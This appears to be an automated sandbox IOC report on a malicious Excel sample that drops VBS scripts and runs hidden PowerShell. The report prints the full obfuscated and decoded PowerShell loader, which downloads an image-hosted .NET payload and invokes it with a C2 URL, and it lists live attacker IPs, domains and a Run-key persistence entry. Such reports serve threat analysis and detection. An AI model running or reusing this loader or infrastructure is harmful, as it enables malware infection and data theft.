IOC Report
Ref19920830281982938RT.xls

loading gif

Files

File Path
Type
Category
Malicious
Ref19920830281982938RT.xls
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon May 27 01:42:46 2024, Security: 1
initial sample
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\lioniskingandtigerisalsotryingforkingbutdifferentistheattitudeofthistwoanimalaredifferentlionsisalwaysalionitsucantcomparewith__anyotherbecauselionbeauties[1].doc
ISO-8859 text, with very long lines (6956), with CRLF, CR, LF line terminators
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A9EAB33D.doc
ISO-8859 text, with very long lines (6956), with CRLF, CR, LF line terminators
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{8D0975D7-21A3-4DB8-9D99-C358C75C774D}.tmp
Composite Document File V2 Document, Cannot read section info
dropped
 malicious
C:\Users\user\AppData\Local\Temp\note\nots.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\nLNG.url
MS Windows 95 Internet shortcut text (URL=<http://z2.ink/nLNG>), ASCII text, with CRLF line terminators
dropped
 malicious
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\z2.ink.url
MS Windows 95 Internet shortcut text (URL=<http://z2.ink/>), ASCII text, with CRLF line terminators
dropped
 malicious
C:\Users\user\AppData\Roaming\onsandtigerbeautifulpicture.vbs
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
 malicious
C:\ProgramData\incontrovertido.vbs
Non-ISO extended-ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\iuC2i[1].txt
ASCII text, with very long lines (11197), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lionsandtigerbeautifulpicture[1].bmp
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\json[1].json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\50562C8B.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\940091CF.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C3B2A510.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A547D21A-47F4-4566-9EA0-48AE4C38E9E8}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D529C5CE-8285-45BA-B66A-9D8DB1B4065B}.tmp
data
dropped
C:\Users\user\AppData\Local\Temp\23fz5h35.tig.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\fpcwrtpf.zm0.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\i1h1e4pk.up3.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\mzbur00x.4zp.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\vm3onvdv.zcw.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\ytgejtgm.ehe.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\{2EA2BB7C-3DC4-4942-9968-E3B99D7EA63D}
data
dropped
C:\Users\user\AppData\Local\Temp\{DB6FE7D5-749B-4053-8C55-3569E64CB263}
data
dropped
C:\Users\user\AppData\Local\Temp\~DF413A5A3890D32AE4.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DFA4A63D3B720884E3.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DFBAFA395254C35D69.TMP
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Generic INItialization configuration [xls]
modified
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
data
dropped
C:\Users\user\Desktop\FE430000
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon May 27 08:00:58 2024, Security: 1
dropped
C:\Users\user\Desktop\FE430000:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
C:\Users\user\Desktop\Ref19920830281982938RT.xls (copy)
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon May 27 08:00:58 2024, Security: 1
dropped
There are 26 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
 malicious
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
 malicious
C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
 malicious
C:\Windows\SysWOW64\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\onsandtigerbeautifulpicture.vbs"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreRQBXDgTreEgDgTreLwDgTrewDgTreDDgTreDgTreNQDgTrewDgTreDDgTreDgTreMQDgTrevDgTreDQDgTreNQDgTrexDgTreC4DgTreODgTreDgTre3DgTreDEDgTreLgDgTre2DgTreDQDgTreLgDgTre4DgTreDkDgTreMQDgTrevDgTreC8DgTreOgBwDgTreHQDgTredDgTreBoDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwDgTrexDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBDDgTreDoDgTreXDgTreBQDgTreHIDgTrebwBnDgTreHIDgTreYQBtDgTreEQDgTreYQB0DgTreGEDgTreXDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreaQBuDgTreGMDgTrebwBuDgTreHQDgTrecgBvDgTreHYDgTreZQByDgTreHQDgTreaQBkDgTreG8DgTreJwDgTresDgTreCcDgTreUgBlDgTreGcDgTreQQBzDgTreG0DgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.EWH/005001/451.871.64.891//:ptth' , '1' , 'C:\ProgramData\' , 'incontrovertido','RegAsm',''))} }"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\incontrovertido.vbs
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
 malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\incontrovertido.vbs"
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\incontrovertido.vbs"
malicious
There are 2 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634
188.114.97.3
 malicious
https://paste.ee/d/iuC2i
188.114.97.3
 malicious
http://198.46.178.154/100500/vff/lioniskingandtigerisalsotryingforkingbutdifferentistheattitudeofthistwoanimalaredifferentlionsisalwaysalionitsucantcomparewith__anyotherbecauselionbeauties.doc
198.46.178.154
 malicious
http://198.46.178.154/100500/HWE.txt
198.46.178.154
 malicious
http://198.46.178.154/100500/lionsandtigerbeautifulpicture.bmp
198.46.178.154
 malicious
http://geoplugin.net/json.gp
178.237.33.50
 malicious
sembe.duckdns.org
malicious
https://uploaddeimagens.com.br/images/00
unknown
 malicious
http://geoplugin.net/json.gp/C
unknown
 malicious
https://uploaddeimagens.com.br
unknown
 malicious
http://nuget.org/NuGet.exe
unknown
http://crl.entrust.net/server1.crl0
unknown
http://ocsp.entrust.net03
unknown
http://z2.ink/nLNG
54.241.153.192
http://198.46.178.154/100500/lionsandtigerbeautifulpicture.bmpj
unknown
https://contoso.com/License
unknown
https://www.google.com;
unknown
https://contoso.com/Icon
unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
unknown
https://analytics.paste.ee
unknown
http://www.diginotar.nl/cps/pkioverheid0
unknown
https://paste.ee/d/iuC2igv
unknown
https://paste.ee/e
unknown
http://z2.ink/nLNGyX
unknown
https://www.google.com
unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://analytics.paste.ee;
unknown
https://cdnjs.cloudflare.com
unknown
https://cdnjs.cloudflare.com;
unknown
http://ocsp.entrust.net0D
unknown
http://z2.ink/
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://secure.comodo.com/CPS0
unknown
https://secure.gravatar.com
unknown
https://themes.googleusercontent.com
unknown
http://crl.entrust.net/2048ca.crl0
unknown
http://198.46.178.154/100500/lionsandtigerbeautifulpicture.bmpw
unknown
There are 29 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
sembe.duckdns.org
194.187.251.115
 malicious
paste.ee
188.114.97.3
 malicious
z2.ink
54.241.153.192
 malicious
uploaddeimagens.com.br
188.114.97.3
 malicious
geoplugin.net
178.237.33.50

IPs

IP
Domain
Country
Malicious
54.241.153.192
z2.ink
United States
malicious
188.114.97.3
paste.ee
European Union
malicious
198.46.178.154
unknown
United States
malicious
194.187.251.115
sembe.duckdns.org
United Kingdom
malicious
178.237.33.50
geoplugin.net
Netherlands

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
 malicious
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Path
 malicious
HKEY_CURRENT_USER\Software\Rmc-999Z97
exepath
 malicious
HKEY_CURRENT_USER\Software\Rmc-999Z97
licence
 malicious
HKEY_CURRENT_USER\Software\Rmc-999Z97
time
 malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
1 (
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
Enabled
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\27ED0
27ED0
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
9*(
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
